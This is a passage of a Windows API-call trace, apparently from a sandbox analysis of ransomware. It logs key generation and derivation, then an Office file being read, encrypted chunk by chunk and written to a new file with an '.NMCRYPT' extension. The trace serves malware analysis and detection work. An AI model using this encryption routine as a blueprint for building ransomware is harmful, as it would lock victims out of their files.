dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.106] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.108] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7eb2c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0171.109] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7eb2c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0171.109] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0171.109] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.110] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad2f8) returned 1 [0171.110] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0171.110] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0171.110] wcslen (_String="\\\\?\\") returned 0x4 [0171.110] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7eb34 | out: phKey=0x2d7eb34*=0x9ad4f8) returned 1 [0171.110] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0171.503] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0171.503] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7eb24 | out: lpFileSize=0x2d7eb24*=174528) returned 1 [0171.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7eb1c*=0x200, lpOverlapped=0x0) returned 1 [0171.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.505] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.505] GetLastError () returned 0x0 [0171.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.507] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.507] GetLastError () returned 0x0 [0171.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.507] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.507] GetLastError () returned 0x0 [0171.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.507] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.507] GetLastError () returned 0x0 [0171.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.507] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.507] GetLastError () returned 0x0 [0171.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.507] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.507] GetLastError () returned 0x0 [0171.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.508] GetLastError () returned 0x0 [0171.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.508] GetLastError () returned 0x0 